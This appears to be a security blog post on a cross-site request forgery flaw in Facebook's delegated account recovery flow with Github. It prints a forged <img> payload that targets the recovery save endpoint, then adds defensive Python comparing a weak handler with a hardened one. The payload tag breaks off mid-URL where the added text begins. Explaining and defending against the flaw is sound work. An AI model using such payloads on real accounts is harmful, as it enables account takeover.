Note: this is going to be a quick post. This year, at the Enigma 2017 conference, Facebook introduced a way to move account recovery beyond email and the "secret" question. After the presentation they moved operationally and presented the first integration partner: Github. These days I have seen a lot of press around this, and both Facebook and Github open sourced their implementation and specification (also presented at F8).

Well, it turned out that the Facebook side was susceptible to Cross Site Request Forgery. Really simple explanation: the attacker starts the integration with Github and stops the flow at the right moment. They then create an attacker page such as https://github.com/asanso/asanso.github.io/blob/master/facebook/test_fb.html

<html>
<img src="https://www.facebook.com/recovery/delegated/save/?fr=OkpK%2FnF9oZk%3D&relay_token=AfFdhnFYiPWXlcS17dG19Tz4sJT%2B%2FzBorBbDwEKgNMvxUHRIqMAnmmEGrGZlMheUfJdNHv40xyraKOfj64fR7ZgZ8HNNmincyRiHdu6Nju
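What makes the page above work is that the save endpoint honours a state-changing request that any third-party page can trigger with a plain `<img>` tag: a GET, no proof that the request came from the recovery provider's own UI, no binding to the logged-in session. The following Python is an added example written for this post; it is not Facebook's or Github's code and is not from the original post. It models a hypothetical save handler that takes the two query parameters visible in the `<img>` URL (`fr` and `relay_token`), first in a weak form that behaves like the one described, then hardened with the checks a defender would add: a POST-only state change, a `Sec-Fetch-Site` metadata check, and a session-bound anti-CSRF token compared in constant time. Every session, request, secret and token value below is constructed for the demo.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Mapping, Tuple

# Constructed server-side secret for the demo; a real deployment keeps this in a secret store.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


@dataclass
class Session:
    """Authenticated browser session at the recovery provider (hypothetical model)."""
    user_id: str
    csrf_seed: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    """Minimal HTTP request model: method, headers, and merged query/form parameters."""
    method: str
    headers: Mapping[str, str]
    params: Mapping[str, str]


def csrf_token_for(session: Session) -> str:
    """Per-session anti-CSRF token derived with HMAC, so only the seed is stored."""
    return hmac.new(SERVER_SECRET, session.csrf_seed.encode(), hashlib.sha256).hexdigest()


def save_token_weak(req: Request, session: Session,
                    store: Dict[str, Tuple[str, str]]) -> Tuple[int, str]:
    """Weak handler: any request carrying both parameters is honoured, regardless of
    HTTP method or where the request came from. An <img src=...> on a third-party
    page satisfies this, which is the CSRF condition described in the post."""
    fr, relay = req.params.get("fr"), req.params.get("relay_token")
    if not fr or not relay:
        return 400, "missing parameters"
    store[session.user_id] = (fr, relay)  # recovery token saved under the victim's session
    return 200, "saved"


def save_token_hardened(req: Request, session: Session,
                        store: Dict[str, Tuple[str, str]]) -> Tuple[int, str]:
    """Hardened handler: same storage step, guarded by three independent checks."""
    # 1. State changes only over POST: an <img> tag (and a top-level navigation) issues GET.
    if req.method != "POST":
        return 405, "state change requires POST"
    # 2. Fetch metadata: modern browsers label requests from another site as "cross-site".
    #    Absent header (older browser) falls through to the token check below.
    fetch_site = req.headers.get("Sec-Fetch-Site")
    if fetch_site not in (None, "same-origin", "none"):
        return 403, "cross-site request rejected"
    # 3. Session-bound anti-CSRF token; a third-party page cannot read it to include it.
    supplied = req.params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token_for(session)):
        return 403, "csrf token missing or invalid"
    fr, relay = req.params.get("fr"), req.params.get("relay_token")
    if not fr or not relay:
        return 400, "missing parameters"
    store[session.user_id] = (fr, relay)
    return 200, "saved"


def demo() -> Dict[str, object]:
    """Replays the <img>-triggered GET and two POST variants against both handlers."""
    victim = Session(user_id="victim")
    weak_store: Dict[str, Tuple[str, str]] = {}
    hard_store: Dict[str, Tuple[str, str]] = {}
    # Constructed placeholder values standing in for the attacker's tokens.
    attacker_params = {"fr": "FR-PLACEHOLDER", "relay_token": "RELAY-TOKEN-PLACEHOLDER"}

    # What the browser sends when the victim loads the attacker's page with the <img> tag.
    img_get = Request("GET", {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Dest": "image"},
                      attacker_params)
    # A forged auto-submitting form from another site: POST, but still cross-site and tokenless.
    forged_post = Request("POST", {"Sec-Fetch-Site": "cross-site"}, attacker_params)
    # The legitimate submission from the provider's own UI, carrying the session token.
    legit_post = Request("POST", {"Sec-Fetch-Site": "same-origin"},
                         {**attacker_params, "csrf_token": csrf_token_for(victim)})

    return {
        "weak_img_get": save_token_weak(img_get, victim, weak_store)[0],
        "weak_store_written": "victim" in weak_store,
        "hardened_img_get": save_token_hardened(img_get, victim, hard_store)[0],
        "hardened_forged_post": save_token_hardened(forged_post, victim, hard_store)[0],
        "hardened_store_untouched": "victim" not in hard_store,
        "hardened_legit_post": save_token_hardened(legit_post, victim, hard_store)[0],
        "hardened_store_written_after_legit": "victim" in hard_store,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The three checks are deliberately independent: the method check alone stops the `<img>` trick but not a forged form, `Sec-Fetch-Site` is only sent by browsers that implement fetch metadata, and the session-bound token is the check that does not depend on the client at all. Running `demo()` shows the weak handler writing the attacker's placeholder token into the victim's record on the bare GET, while the hardened handler only writes on the same-origin POST that carries the session's token.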